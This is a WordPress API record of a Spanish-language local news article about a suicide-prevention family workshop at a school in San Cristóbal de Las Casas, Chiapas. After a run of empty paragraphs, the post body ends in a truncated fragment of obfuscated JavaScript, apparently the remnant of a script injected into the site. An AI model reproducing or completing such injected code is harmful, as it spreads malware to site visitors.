{"id":17807,"date":"2024-09-12T02:45:52","date_gmt":"2024-09-12T02:45:52","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=17807"},"modified":"2024-09-12T02:45:53","modified_gmt":"2024-09-12T02:45:53","slug":"conmemoran-dia-internacional-de-la-prevencion-contra-el-suicidio","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=17807","title":{"rendered":"Conmemoran D\u00eda Internacional de la Prevenci\u00f3n contra el Suicidio"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240911-WA0014-1024x576.jpg\" alt=\"\" class=\"wp-image-17808\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240911-WA0014-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240911-WA0014-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240911-WA0014-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240911-WA0014.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>11 de septiembre del 2024. San Crist\u00f3bal de Las Casas.- En el marco del D\u00eda Internacional de la Prevenci\u00f3n contra el Suicidio, la Coordinaci\u00f3n de Prevenci\u00f3n del Delito Municipal llev\u00f3 a cabo el taller &#8220;Familia de hierro o de papel&#8221; en la Escuela Telesecundaria 297 &#8220;Juan Bosco Occhiena&#8221;, ubicada en San Crist\u00f3bal de Las Casas.<\/p>\n\n\n\n<p>El objetivo de esta actividad fue fortalecer los lazos familiares y afectivos entre padres e hijos, con un enfoque especial en la prevenci\u00f3n del suicidio en ni\u00f1os y adolescentes. Personal de la coordinaci\u00f3n inform\u00f3 que se ofreci\u00f3 informaci\u00f3n valiosa sobre c\u00f3mo mejorar la crianza y promover el bienestar emocional de los j\u00f3venes a trav\u00e9s de din\u00e1micas l\u00fadicas.<\/p>\n\n\n\n<p>Durante el taller, tambi\u00e9n se compartieron estrategias para criar ni\u00f1os y adolescentes felices, subrayando la importancia de la disciplina como un factor clave en su desarrollo.<\/p>\n\n\n\n<p>La Coordinaci\u00f3n de Prevenci\u00f3n del Delito aprovech\u00f3 la ocasi\u00f3n para exhortar a los padres a estar atentos a las conductas de sus hijos, recordando que el suicidio en M\u00e9xico ocupa el lugar 19 entre las principales causas de muerte. De acuerdo con datos del INEGI, en 2023 se registraron 8,837 v\u00edctimas de suicidio en el pa\u00eds.<\/p>\n\n\n\n<p>Este tipo de actividades refuerza la importancia de la uni\u00f3n familiar y la atenci\u00f3n temprana a problemas emocionales, como una herramienta clave para prevenir tragedias y promover el bienestar integral de las familias mexicanas.<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 11 de septiembre del 2024. San Crist\u00f3bal de Las Casas.- En el marco del D\u00eda Internacional de la Prevenci\u00f3n contra el Suicidio, la Coordinaci\u00f3n de Prevenci\u00f3n del Delito Municipal llev\u00f3 a cabo el taller &#8220;Familia de hierro o de papel&#8221; en la Escuela Telesecundaria 297 &#8220;Juan Bosco Occhiena&#8221;, ubicada en San Crist\u00f3bal &hellip;<\/p>\n","protected":false},"author":2,"featured_media":17808,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-17807","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17807","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17807"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17807\/revisions"}],"predecessor-version":[{"id":17809,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/17807\/revisions\/17809"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/17808"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17807"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17807"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17807"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}